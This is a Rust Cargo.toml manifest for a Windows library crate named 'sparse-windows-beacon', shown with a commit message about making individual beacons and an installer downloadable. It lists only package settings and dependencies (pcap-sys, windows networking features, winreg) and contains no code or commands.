Andrew Rioux c0fe4f2bdb
fix: everything builds
made it also possible to download individual beacons as opposed to just
the installer, to provide more options and make it easier to test
2025-02-13 15:03:14 -05:00

17 lines
449 B
TOML

[package]
name = "sparse-windows-beacon"
edition = "2024"
version.workspace = true
[lib]
crate-type = ["cdylib"]
[dependencies]
anyhow = "1.0.95"
pcap-sys = { version = "0.1.0", path = "../pcap-sys" }
windows = { version = "0.59.0", features = ["Win32_NetworkManagement_IpHelper", "Win32_NetworkManagement_Ndis", "Win32_Networking_WinSock", "Win32_System_SystemServices", "Win32_UI_WindowsAndMessaging"] }
winreg = "0.55"
[features]
service = []